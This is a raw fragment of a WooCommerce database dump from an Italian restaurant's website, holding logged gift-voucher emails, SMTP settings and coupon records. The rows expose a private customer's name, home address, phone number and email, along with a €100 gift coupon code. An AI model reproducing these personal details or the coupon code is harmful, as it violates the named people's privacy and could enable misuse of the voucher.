sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(37553,3689,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione <notifiche@ristorantesolymar.it>\r\n'),(37554,3689,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=\r\n=09=09=09<tr>=0A=09=09=09=09=09=09=09=09<td align=3D\"center\" valign=3D\"t=\r\nop\">=0A=09=09=09=09=09=09=09=09=09<!-- Body -->=0A=09=09=09=09=09=09=09=\r\n=09=09<table border=3D\"0\" cellpadding=3D\"0\" cellspacing=3D\"0\" width=3D\"6=\r\n00\" id=3D\"template_body\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09<td valign=3D\"top\" id=3D\"body_content\" style=\r\n=3D\"background-color: #fdfdfd;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09<=\r\n!-- Content -->=0A=09=09=09=09=09=09=09=09=09=09=09=09<table border=3D\"0=\r\n\" cellpadding=3D\"20\" cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=09=09=\r\n=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=\r\n=09<td valign=3D\"top\" style=3D\"padding: 48px 48px 32px;\">=0A=09=09=09=09=\r\n=09=09=09=09=09=09=09=09=09=09=09<div id=3D\"body_content_inner\" style=3D=\r\n\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial=\r\n, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>=0A=\r\n=0A<p style=3D\"margin: 0 0 16px;\">Hi Elena,</p>=0A<p style=3D\"margin: 0=\r\n 0 16px;\">Just to let you know =E2=80=94 we\'ve received your order #3687=\r\n, and it is now being processed:</p>=0A=0A=0A<h2 style=3D\'color: #557da1=\r\n; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Aria=\r\nl, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; ma=\r\nrgin: 0 0 18px; text-align: left;\'>=0A=09[Order #3687] (24 December 2020=\r\n)</h2>=0A=0A<div style=3D\"margin-bottom: 40px;\">=0A=09<table class=3D\"td=\r\n\" cellspacing=3D\"0\" cellpadding=3D\"6\" border=3D\"1\" style=3D\"color: #7373=\r\n73; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font=\r\n-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">=0A=09=\r\n=09<thead>=0A=09=09=09<tr>=0A=09=09=09=09<th class=3D\"td\" scope=3D\"col\"=\r\n style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align: mid=\r\ndle; padding: 12px; text-align: left;\">Product</th>=0A=09=09=09=09<th cl=\r\nass=3D\"td\" scope=3D\"col\" style=3D\"color: #737373; border: 1px solid #e4e=\r\n4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantity<=\r\n/th>=0A=09=09=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"color: #73737=\r\n3; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; tex=\r\nt-align: left;\">Price</th>=0A=09=09=09</tr>=0A=09=09</thead>=0A=09=09<tb=\r\nody>=0A=09=09=09=09<tr class=3D\"order_item\">=0A=09=09<td class=3D\"td\" st=\r\nyle=3D\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-al=\r\nign: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvet=\r\nica, Roboto, Arial, sans-serif; word-wrap: break-word;\">=0A=09=09Buono R=\r\negalo (valore a scelta)<ul class=3D\"wc-item-meta\" style=3D\"font-size: sm=\r\nall; margin: 1em 0 0; padding: 0; list-style: none;\">=0A<li style=3D\"mar=\r\ngin: 0.5em 0 0; padding: 0;\">=0A<strong class=3D\"wc-item-meta-label\" sty=\r\nle=3D\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p st=\r\nyle=3D\"margin: 0;\"><a href=3D\"mailto:c.lorenzetti@inwind.it\" style=3D\"co=\r\nlor: #557da1; font-weight: normal; text-decoration: underline;\">c.lorenz=\r\netti@inwind.it</a></p>=0A</li>=0A<li style=3D\"margin: 0.5em 0 0; padding=\r\n: 0;\">=0A<strong class=3D\"wc-item-meta-label\" style=3D\"float: left; marg=\r\nin-right: .25em; clear: both;\">From:</strong> <p style=3D\"margin: 0;\">El=\r\nena e Piero</p>=0A</li>=0A<li style=3D\"margin: 0.5em 0 0; padding: 0;\">=\r\n=0A<strong class=3D\"wc-item-meta-label\" style=3D\"float: left; margin-rig=\r\nht: .25em; clear: both;\">Message:</strong> <p style=3D\"margin: 0;\">Tanti=\r\nssimi Auguri di Buone Feste con una piacevole cena per un momemto di rel=\r\nax...</p>=0A</li>=0A</ul>=09=09</td>=0A=09=09<td class=3D\"td\" style=3D\"c=\r\nolor: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: lef=\r\nt; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Rob=\r\noto, Arial, sans-serif;\">=0A=09=09=091=09=09</td>=0A=09=09<td class=3D\"t=\r\nd\" style=3D\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; te=\r\nxt-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', H=\r\nelvetica, Roboto, Arial, sans-serif;\">=0A=09=09=09<span class=3D\"woocomm=\r\nerce-Price-amount amount\">100,00<span class=3D\"woocommerce-Price-currenc=\r\nySymbol\">=E2=82=AC</span></span>=09=09</td>=0A=09</tr>=0A=09=09=09<tr>=\r\n=0A=09=09=09<td colspan=3D\"3\" style=3D\"padding: 12px; text-align: left;=\r\n vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Robot=\r\no, Arial, sans-serif;\">=0A=09=09=09=09<p style=3D\"margin: 0 0 16px;\">Val=\r\nidit=C3=A0 6 mesi dal momento dell\'acquisto</p>=0A=09=09=09</td>=0A=09=\r\n=09</tr>=0A=09=09=0A=09=09</tbody>=0A=09=09<tfoot>=0A=09=09=09=09=09=09=\r\n=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\" scope=3D\"row\" colspan=3D=\r\n\"2\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align:=\r\n middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtot=\r\nal:</th>=0A=09=09=09=09=09=09<td class=3D\"td\" style=3D\"color: #737373; b=\r\norder: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-al=\r\nign: left; border-top-width: 4px;\"><span class=3D\"woocommerce-Price-amou=\r\nnt amount\">100,00<span class=3D\"woocommerce-Price-currencySymbol\">=E2=82=\r\n=AC</span></span></td>=0A=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=\r\n=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\" scope=3D\"row\" colspan=3D=\r\n\"2\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align:=\r\n middle; padding: 12px; text-align: left;\">Payment method:</th>=0A=09=09=\r\n=09=09=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px solid=\r\n #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayP=\r\nal</td>=0A=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=\r\n=09=09=09=09=09=09<th class=3D\"td\" scope=3D\"row\" colspan=3D\"2\" style=3D\"=\r\ncolor: #737373; border: 1px solid #e4e4e4; vertical-align: middle; paddi=\r\nng: 12px; text-align: left;\">Total:</th>=0A=09=09=09=09=09=09<td class=\r\n=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-ali=\r\ngn: middle; padding: 12px; text-align: left;\"><span class=3D\"woocommerce=\r\n-Price-amount amount\">100,00<span class=3D\"woocommerce-Price-currencySym=\r\nbol\">=E2=82=AC</span></span></td>=0A=09=09=09=09=09</tr>=0A=09=09=09=09=\r\n=09=09=09</tfoot>=0A=09</table>=0A</div>=0A=0A=0A<table id=3D\"addresses\"=\r\n cellspacing=3D\"0\" cellpadding=3D\"0\" border=3D\"0\" style=3D\"width: 100%;=\r\n vertical-align: top; margin-bottom: 40px; padding: 0;\">=0A=09<tr>=0A=09=\r\n=09<td valign=3D\"top\" width=3D\"50%\" style=3D\"text-align: left; font-fami=\r\nly: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; p=\r\nadding: 0;\">=0A=09=09=09<h2 style=3D\'color: #557da1; display: block; fon=\r\nt-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-s=\r\nize: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-=\r\nalign: left;\'>Billing address</h2>=0A=0A=09=09=09<address class=3D\"addre=\r\nss\" style=3D\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">=\r\n=0A=09=09=09=09Elena Valentini<br>Via Napoli 19<br>47838<br>Riccione<br>=\r\nRIMINI=09=09=09=09=09=09=09=09=09<br><a href=3D\"tel:3382950071\" style=3D=\r\n\"color: #557da1; font-weight: normal; text-decoration: underline;\">33829=\r\n50071</a>=09=09=09=09=09=09=09=09=09=09=09=09=09<br>c.lorenzetti@inwind.=\r\nit=09=09=09=09=09=09=09</address>=0A=09=09</td>=0A=09=09=09</tr>=0A</tab=\r\nle>=0A<p style=3D\"margin: 0 0 16px;\">Thanks for using www.ristorantesoly=\r\nmar.it!</p>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09=09</div>=0A=09=\r\n=09=09=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=\r\n=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09=09=09=09</table>=0A=\r\n=09=09=09=09=09=09=09=09=09=09=09=09<!-- End Content -->=0A=09=09=09=09=\r\n=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=\r\n=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09<!-- End B=\r\nody -->=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=\r\n=09=09=09=09=09=09</table>=0A=09=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=\r\n=09=09=09=09<tr>=0A=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=\r\n=0A=09=09=09=09=09=09<!-- Footer -->=0A=09=09=09=09=09=09<table border=\r\n=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\" width=3D\"600\" id=3D\"template=\r\n_footer\">=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09<td vali=\r\ngn=3D\"top\" style=3D\"padding: 0; border-radius: 6px;\">=0A=09=09=09=09=09=\r\n=09=09=09=09<table border=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\" wid=\r\nth=3D\"100%\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=\r\n=09=09=09=09=09<td colspan=3D\"2\" valign=3D\"middle\" id=3D\"credit\" style=\r\n=3D\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helveti=\r\nca Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-he=\r\night: 150%; text-align: center; padding: 24px 0;\'>=0A=09=09=09=09=09=09=\r\n=09=09=09=09=09=09<p style=3D\"margin: 0 0 16px;\">Sol Y Mar, ristorante a=\r\n Riccione</p>=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=\r\n=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=\r\n=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</=\r\ntable>=0A=09=09=09=09=09=09<!-- End Footer -->=0A=09=09=09=09=09</td>=0A=\r\n=09=09=09=09</tr>=0A=09=09=09</table>=0A=09=09</div>=0A=09</body>=0A</ht=\r\nml>=0A\r\n.\r\n250 OK queued as 6bd4c54f-d1f3-4329-9416-edf35cdffa34\r\n'),(37555,3690,'discount_type','fixed_cart'),(37556,3690,'coupon_amount','100'),(37557,3690,'individual_use','no'),(37558,3690,'usage_limit','1'),(37559,3690,'usage_limit_per_user','0'),(37560,3690,'limit_usage_to_x_items',NULL),(37561,3690,'usage_count','0'),(37562,3690,'date_expires','1624320000'),(37563,3690,'free_shipping','yes'),(37564,3690,'exclude_sale_items','no'),(37565,3690,'apply_before_tax','no'),(37566,3690,'minimum_amount',''),(37567,3690,'maximum_amount',''),(37568,3690,'exclude_product_ids',''),(37569,3690,'exclude_product_categories',''),(37570,3690,'product_ids',''),(37571,3690,'product_categories','a:0:{}'),(37572,3690,'mwb_wgm_giftcard_coupon','3687'),(37573,3690,'mwb_wgm_giftcard_coupon_unique','online'),(37574,3690,'mwb_wgm_giftcard_coupon_product_id','548'),(37575,3690,'mwb_wgm_giftcard_coupon_mail_to','c.lorenzetti@inwind.it'),(37576,3687,'3687#390','a:1:{i:0;s:18:\"solymarcouponW1FGS\";}'),(37577,3691,'solution','All good, mail sent.'),(37578,3691,'success','1'),(37579,3691,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37580,3691,'to_header','c.lorenzetti@inwind.it'),(37581,3691,'bcc_header','c.lorenzetti@inwind.it'),(37582,3691,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37583,3691,'original_to','c.lorenzetti@inwind.it'),(37584,3691,'original_subject','Sol Y Mar'),(37585,3691,'original_message','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\">\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto; background-color: #ff9898; border-spacing: 10px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px;\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: 0 auto; width: 100%; padding: 10px 0px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0; text-align: left;\"><a style=\"font-weight: normal; text-decoration: none; color: #ffffff; margin-left: 10px;\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></a></td>\r\n<td style=\"padding: 10px 0; text-align: center;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center; padding: 2px 0px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: auto;\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555;\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px;\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px; text-align: center; width: 50%;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/12/regala-un-coupon.png\" width=\"100%\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555; padding: 10px; text-align: left; word-break: break-word;\">\r\n<p style=\"min-height: 180px;\">Tantissimi Auguri di Buone Feste con una piacevole cena per un momemto di relax...</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Elena e Piero</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">A :</span><span style=\"width: 75%; float: left; word-break: break-all;\">c.lorenzetti@inwind.it</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\r\n<h3 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; margin: 16px 0 8px; text-align: left; font-size: 30px; font-family: Arial, Helvetica, sans-serif;\"><span class=\"woocommerce-Price-amount amount\"><bdi>100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></bdi></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center; background-color: #ffd5d5; padding: 10px;\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; border-spacing: 20px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px; font-family: sans-serif; line-height: 20px; color: #ff9898; text-align: center; border: 3px;\">\r\n<h2 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px; font-weight: bold; margin: 0px; text-align: center;\"><img class=\"mwb_wgm_coupon_img\" id=\"1608820227www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1608820227solymarcouponW1FGS.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></p>\r\n<span style=\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Scadenza. 22/06/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; padding: 15px; color: #ffffff; background-color: #ff9898; font-size: 18px; font-family: Arial, Helvetica, sans-serif;\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n</body>\n</html>\n'),(37586,3691,'original_headers','[\"Bcc:c.lorenzetti@inwind.it\"]'),(37587,3691,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\naWNLdWZpCi9DSURTeXN0ZW1JbmZvIDw8IC9SZWdpc3RyeSAoQWRvYmUpIC9PcmRlcmluZyAo\r\nSWRlbnRpdHkpIC9TdXBwbGVtZW50IDAgPj4KL0ZvbnREZXNjcmlwdG9yIDQ0IDAgUgovQ0lE\r\nVG9HSURNYXAgL0lkZW50aXR5Ci9XIFswIFs1OTUgMzM3IF0KXQo+PgplbmRvYmoKNDcgMCBv\r\nYmoKPDwgL0xlbmd0aCAzNjggPj4Kc3RyZWFtCi9DSURJbml0IC9Qcm9jU2V0IGZpbmRyZXNv\r\ndXJjZSBiZWdpbgoxMiBkaWN0IGJlZ2luCmJlZ2luY21hcAovQ0lEU3lzdGVtSW5mbyA8PCAv\r\nUmVnaXN0cnkgKEFkb2JlKSAvT3JkZXJpbmcgKFVDUykgL1N1cHBsZW1lbnQgMCA+PiBkZWYK\r\nL0NNYXBOYW1lIC9BZG9iZS1JZGVudGl0eS1VQ1MgZGVmCi9DTWFwVHlwZSAyIGRlZgoxIGJl\r\nZ2luY29kZXNwYWNlcmFuZ2UKPDAwMDA+IDxGRkZGPgplbmRjb2Rlc3BhY2VyYW5nZQoyIGJl\r\nZ2luYmZyYW5nZQo8MDAwMD4gPDAwMDA+IDwwMDAwPgo8MDAwMT4gPDAwMDE+IDwwMDIwPgpl\r\nbmRiZnJhbmdlCmVuZGNtYXAKQ01hcE5hbWUgY3VycmVudGRpY3QgL0NNYXAgZGVmaW5lcmVz\r\nb3VyY2UgcG9wCmVuZAplbmQKCmVuZHN0cmVhbQplbmRvYmoKNyAwIG9iago8PCAvVHlwZSAv\r\nRm9udAovU3VidHlwZSAvVHlwZTAKL0Jhc2VGb250IC9Ecm9pZEFyYWJpY0t1ZmkKL0VuY29k\r\naW5nIC9JZGVudGl0eS1ICi9EZXNjZW5kYW50Rm9udHMgWzQ2IDAgUl0KL1RvVW5pY29kZSA0\r\nNyAwIFI+PgplbmRvYmoKNDkgMCBvYmoKPDwgL1R5cGUgL0ZvbnREZXNjcmlwdG9yCi9Gb250\r\nTmFtZSAvUVhCQUFBK05pbWJ1c1NhbnMtUmVndWxhcgovRmxhZ3MgNCAKL0ZvbnRCQm94IFst\r\nMjEwIC0yOTkgMTAzMiAxMDc1IF0KL0l0YWxpY0FuZ2xlIDAgCi9Bc2NlbnQgNzI5IAovRGVz\r\nY2VudCAtMjcxIAovQ2FwSGVpZ2h0IDcyOSAKL1N0ZW1WIDUwIAovRm9udEZpbGUyIDUwIDAg\r\nUgo+PgplbmRvYmoKNTAgMCBvYmoKPDwKL0xlbmd0aDEgNDM2MCAKL0xlbmd0aCA1MyAwIFIK\r\nL0ZpbHRlciAvRmxhdGVEZWNvZGUKPj4Kc3RyZWFtCnicjVd7WFTXtd9rnwdYFTPAzOj1NcPA\r\njDCOwzAwIw8FeRNgwOGpRHkOr8wwyEMYUKk1SBKCkRhRfMRIHiWUpCbVtE2/2JjGGtuYYpOp\r\n9ebmS6Jfc7/W3F5vbpJ6I3O465wZbNL0j25mc9baZ+211/6tx96HACEkmHyfMIQUlRjjOrvf\r\nfAhHHsNe0+T0NJos579A+jNCFjmbHbUNjhV5ekIWV+KYpRkHFrweJEf+IPKRza6u3qF3F5Ug\r\nf1bU4XTX1ya8sP5DQkLSkM911fa2Ex3JQv5h5FVttS5H12rHu8hPEkJrCEMH4CDhCEsfpeIK\r\n+f4nbCdxkIA8vppvdEg0e76V5VfYSBpR3WXpdeF/yNusGfQ1hJySJFn6rrga7hAI2s6e57wk\r\nCLWqE9RytcxMvfDnuy747DxnmJz8+j2cQMrnZthctpjEkQxConheE6FNkGm1Op4Pwp/ZYjEr\r\nFEo5z0u8+C8oHAcUFqtCYY2zWKwQjmPiJK3FasFmZXOX3McbjHDl173nrNoIOr2gv7e7D6hs\r\nTZa5ake2UfkLMA4/X//jquDS0mVRKqXgXR3VcrjRRfsfSd+yPkbRwIA+mvYcGANIS4luttVs\r\nh5ICw0rdv4Xyi2QhS4KLZu7fuQsgv7Q0H9hgHtz6VHXtVnvJ9vAFixcuWYibJY8TwvwJ96Qk\r\nJExmlsWLZqHRSGqx6SL4oITHp3WFzgzHTjoFpso9BT0vZLKmu7+jxZsHa8xA22t9yxh9urMg\r\nBhxtZ1HjyrmrNJirFDWCRoZ/crMsXGGOs1gTeF7Ha62IbfCZqdHRlkZVmj50zVLrGjjDmkAn\r\nXB+e9ZaV8cEHeRYgOpF+hJijP8GMnmEk32jQLtQH5qmp6WnRCs57TdxF9twMM427iEVGcgjP\r\ny3kF7kOpUMglR+lwWOP3g8Uar9Uhb/VvldnLvP1a9RFXIkQU76t5uqKIDu3IdqvkCv4s9977\r\nDc90bYTRp55tqQbwtDa6WIZ/6kcAxnJPXmrN/RaFTpFjKaqK1IRvWP/aOTBW7inqOaDVKfMS\r\n88sBKkr9CPPL0LY130H4W2Aj1BgyWq3GD7k2q8pS3QTSc3szTMPpMcuWwtyo2OHGB5/aJDlg\r\nIrGxYC2Au8m3cp7e4fCtZKIOHoNQXerasqKK6iNi3GowQxKl6P4e4hNmBg2Yw6LUYcxvx72+\r\nL77yffbbk3ShEPkVXBBSOe/Xerhwik6i5YOI6gesiSwjRI2OFFHVoKFIYlwrzArRfDnzwRTE\r\nFDjTm7phylg5UJxUV1GoY02+p0v3V8eBu57emb2Y6SrUgdxYYBlDa3KEdOY64hFDrGiNHHcc\r\ncJdS0mmVh/NSnIjuUkhxI+ZKgoxDpCSEtAnxFiY57Wh93cTOjZCRlXK4tPpwhjq73dbWtfDH\r\n/MbW0S09P7es0i9fLFgffgLgyf2DrshR1nS8ugrKT3r3Dl0pzs2Dqkar88i2GIDKbQU9Zfqc\r\n9KgtnYermb0D8O9XLnoBnj7RcPEDMbZGEMJRtDdk3n/KhEBijEz/8GX5qpCS4RzJH4Y3fsK+\r\nRBlwdr8pop6A6H2FqIeLnsfInY/LAHZWDGNxg0oJ1gj/tiwW5qsp6wutrVOetFTPi22u5zKP\r\nCtGZ7iK0U1/kysjrsuv19i7O6/NuLgUoPjwz8Oj1o0WwpWGEOQPJruM12zGQk1zj1dvGXSmY\r\n2mRibo6dRSvCiBoRJ2a1QsRTzACLVStlhTpMpo5D8JVi1dKpZTK1H+gJOtF8OsWaDPtGrgCk\r\nJKacavFNnIcdNoe2mNJircMmPA5XBx4DeGwANmxKPrp1/4vWmk/tjyXEm8G3Gz5YtmJjf/+G\r\nVUvBV04pDPV59oOIy/1zV9lwxFNGIhCXv0MiZSalQXEBUCRP4xg1dJ7t37Rp19mu9rN70oHO\r\n/mfuDgkPz4FRTzT0drDFUHT4/aFH/nCosPDQ7wdhKaw7kew6WV979DTAM8fr3no2UVzXjusu\r\nx3VXizhAvLT5b7pErNAaPshfKvz1WfIPuzxoiXxF+dSRjnPfz0zfc7az6thPNNN5M/ZBvWop\r\nsKxps3NTmrNID/BRSkN/cnpTOwX7Me9D+987VGh64pU/QE7m2tai4TxPuREgtqI3F2PqZ3je\r\nTKBXFvjPG5nYzdBD3/atZ/Szil/SyUn4cPJrvRh/qXNXmauS3VJt+5bNoslUzMl4fym7GByx\r\nKvGn7e4zu9PT+8+4L9wImzZcP3gCjh9o/UEovVzoMuRj2JSM/3HwoZlDNrj2tiCA98JvPqbg\r\ncYsYuYV01ohrSTEbZpbNF0ytH6qgBA33T2LWPZ1+qrkJQxYg1TPV6v5Rykm4lt2x2QCwbnNH\r\nVra7MDq6EFVTY2kh2J78/d6ha+N2gLrtE3shpX285oExV1Kia7xm+7grWdxxOAbuTaw7PNYd\r\nrFX4o7lw/A3hqvDJBfCwptljTOPd34mSw/jPKp0O0tkA1ulpsYDhG6x5zGXUIR5yfh1gxh8t\r\nh+Y3BGy/giZh8E2QwaJLVE95oR8GfZ/7PoQTQgPOfgVnDRFJb5R43gx5seH4mGCjpbie/F7k\r\nhiIaZu08Ela4aeuvMBgq+m07slpyIiNzWrI4b+OtWaG3f47c/UuD69bf/m9X352/3XKjtjqM\r\nyDvcX8kGybOibyP9vqUcJ51bmJAaXnS5VaOQyqO/GIqJG4Xy1vkDhL0IzIIlCzcKc6/vems4\r\nF0ALnSODkLxu3fDW/smEGB17DmIMhb7p/d68qJR0gOeOCo9mVZdSY0V/4ctvMOzqqITomOV7\r\nBzHPO59pEP47vy6qp3yjO0K9CjPbuCOr6YmUB1uT16+wPdzw6AW9QxZdWG7dlhEJcPyQGKGI\r\n9SRiLUWzXA1yDGdghmc/ohW+PUyLr5HuZk2HZ4VjYwwrndZ4+VJyl8laRFctJZrVMl+N7t2l\r\nrPP5h6z/OqVmF/lYLmJDdeY7R04A5KRtmmgcuZyii6LnmPBwzb6SDU1iFtbXvN4x/oCeY379\r\nisGWmxfdWfrx8APPbkhMFCMu6agrrz4qoxAgJt+RsnXM4k7fc/BcL1o1d3vuGs0OxJIYK15h\r\neTt8iuFEOUHMjQr0VghaLSPLJe8H8VR5X6jSEhqmpWh5kEp2H9WpmPtCqbn5xcScHLh969Mv\r\nALJykl9sBM3omHADRrnLUJ5fL3jfER4WdgPAALS/DwZHQdkp36TwljAD1AFGMEqrzbDLcbVI\r\nYvFHh86/opj2ym+lZURQaKgYBPDds2R2Sfbp5/t+sykrFRavjFUn/dzT9NJADkDGzonaP+6k\r\nz52s3qOcI/sOUzxcmjekOYv1McVuNnfryFEKbQ0u4cal6uP73MYHtkHu4Lm2xhd2ZcJpCINI\r\nCt0PClN06snc7gpDbKUnN6vDvk707FUE6hJaLd4zxKua5Dc5DT3XozTb9jayq+9+wl0ua01W\r\n